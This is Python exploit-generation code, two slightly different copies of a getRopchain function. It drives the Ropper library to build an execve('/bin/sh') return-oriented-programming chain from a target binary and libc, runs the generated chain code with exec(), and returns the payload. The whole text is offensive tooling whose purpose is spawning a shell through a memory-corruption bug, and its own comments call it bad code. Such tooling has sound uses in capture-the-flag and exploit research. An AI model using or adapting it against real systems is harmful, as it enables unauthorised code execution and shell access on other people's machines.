def getRopchain(properties, bad_bytes): """ ' given n files, generate an execve rop chain and return it. ' I did not want to try and butcher ropper, so rs.createRopChain ' returns python code to print the rop chain to stdout ' I run it and steal the "rop" variable for my chain ' ' This is horrible code, do not repeat my mistakes 'badbytes': ''.join(bad_bytes), """ options = { 'color': False, 'badbytes': ''.join(bad_bytes), 'all': False, 'inst_count': 6, 'type': 'all', 'count_of_findings': 5, 'cfg_only': False, 'detailed': False } rs = RopperService(options) if 'libc' in properties and properties['libc'] is not None: rs.addFile(properties['libc']) rs.addFile(properties['file']) rs.loadGadgetsFor() '''Acceptable arches are formated differently than pwntools: x86 x86_64 ARM ... see https://github.com/sashs/Ropper/blob/a708fae670eece2b86daeaa276b38cb033eab231/README.md''' # These arches can span to mips and ppc arch = 'x86' if '64' in properties['protections']['arch']: arch = 'x86_64' elif 'arm' in properties['protections']['arch'].lower(): arch = 'ARM' # If you were looking for good programming examples, you've # come to the wrong place friend chain = rs.createRopChain("execve", arch, {'cmd': '/bin/sh'}) chain = chain.replace(" '", " b'") # convert all strings to bytes chain = chain.replace("print rop", "") # removes invalid print statement if "Cannot create chain" in chain or 'INSERT' in chain: print("[-] Failed to create rop chain. Try adding linked libraries") if 'libc' not in properties or properties['libc'] is None: print("[~] Try adding linked libc") exit(0) namespace = {} exec(chain, namespace) # rop variable created inside of "chain" python script if 'libc' in properties: rs.removeFile(properties['libc']) rs.removeFile(properties['file']) return namespace['rop']
def getRopchain(properties, bad_bytes): options = { 'color': False, 'badbytes': ''.join(bad_bytes), 'all': False, 'inst_count': 6, 'type': 'all', 'count_of_findings': 5, 'cfg_only': False, 'detailed': False } rs = RopperService(options) print(properties['libc']) if 'libc' in properties and properties['libc'] is not None: rs.addFile(properties['libc']) rs.addFile(properties['file']) rs.loadGadgetsFor() '''Acceptable arches are formated differently than pwntools: x86 x86_64 ARM ... see https://github.com/sashs/Ropper/blob/a708fae670eece2b86daeaa276b38cb033eab231/README.md''' #These arches can span to mips and ppc arch = 'x86' if '64' in properties['protections']['arch']: arch = 'x86_64' elif 'arm' in properties['protections']['arch'].lower(): arch = 'ARM' #If you were looking for good programming examples, you've #come to the wrong place friend chain = rs.createRopChain("execve", arch, {'cmd': '/bin/sh'}) if "Cannot create chain" in chain or 'INSERT' in chain: print("[-] Failed to create rop chain. Try adding linked libraries") if 'libc' not in properties or properties['libc'] is None: print("[~] Try adding linked libc") exit(0) namespace = {} exec(chain, namespace) #rop variable created inside of "chain" python script if 'libc' in properties: rs.removeFile(properties['libc']) rs.removeFile(properties['file']) return namespace['rop']